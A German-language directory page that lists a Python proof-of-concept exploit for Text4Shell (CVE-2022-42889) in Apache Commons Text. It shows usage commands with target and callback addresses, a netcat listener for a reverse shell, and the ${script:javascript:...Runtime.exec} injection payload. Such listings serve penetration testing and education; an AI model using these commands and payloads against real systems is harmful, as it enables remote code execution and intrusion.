Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
text4shell-exploit — Ein eigens entwickelter, auf Python basierender Proof-of-Concept-Exploit (PoC), der auf Text4Shell (CVE-2022-42889) abzielt, eine kritische Schwachstelle zur Remote-Code-Ausführung in Apache Commons Text Versionen < 1.10. | Kitploit
Tools/GitHubGitHub/syndicate27/text4shell-exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubsyndicate27/text4shell-exploit

text4shell-exploit

Ein eigens entwickelter, auf Python basierender Proof-of-Concept-Exploit (PoC), der auf Text4Shell (CVE-2022-42889) abzielt, eine kritische Schwachstelle zur Remote-Code-Ausführung in Apache Commons Text Versionen < 1.10.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
11vor 1 JahrNoch nicht geprüft
Teilen

text4shell-exploit

Ein benutzerdefinierter, auf Python basierender Proof-of-Concept-Exploit (PoC), der auf Text4Shell (CVE-2022-42889) abzielt, eine kritische Remote-Code-Ausführungs-Schwachstelle in Apache Commons Text Versionen < 1.10. Dieser Exploit zielt auf verwundbare Java-Anwendungen ab, die die Klasse StringSubstitutor mit aktivierter Interpolation verwenden, was die Injektion von ${script:...}-Ausdrücken ermöglicht, um beliebige Systembefehle auszuführen.

In diesem PoC wird die Ausnutzung über den Abfrageparameter data demonstriert; der Name des verwundbaren Parameters kann jedoch je nach Implementierung variieren. Benutzer sollten den Payload und den Anforderungspfad entsprechend an die Logik der Zielanwendung anpassen.

Haftungsausschluss: Dieser Exploit dient ausschließlich Bildungs- und autorisierten Penetrationstest-Zwecken. Verwenden Sie ihn verantwortungsvoll und auf eigenes Risiko.

Beschreibung

Dies ist ein benutzerdefinierter Python3-Exploit für die Apache-Commons-Text-Schwachstelle, die als Text4Shell (CVE-2022-42889) bekannt ist. Er ermöglicht Remote-Code-Ausführung (RCE) über unsichere Interpolatoren, wenn Benutzereingaben dynamisch von StringSubstitutor ausgewertet werden.

Getestet gegen:

  • Apache Commons Text < 1.10.0
  • Java-Anwendungen, die -Interpolation aus nicht vertrauenswürdigen Eingaben verwenden
${script:...}

Verwendung

root@kitploit:~
python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Beispiel

root@kitploit:~
python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Stellen Sie sicher, dass Sie einen Listener auf Ihrer Angriffsmaschine einrichten:

root@kitploit:~
nc -nlvp 4444

Payload-Logik

Das Skript injiziert:

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

Die Reverse Shell wird über den Parameter /data mittels einer POST-Anfrage gesendet.

Tool herunterladen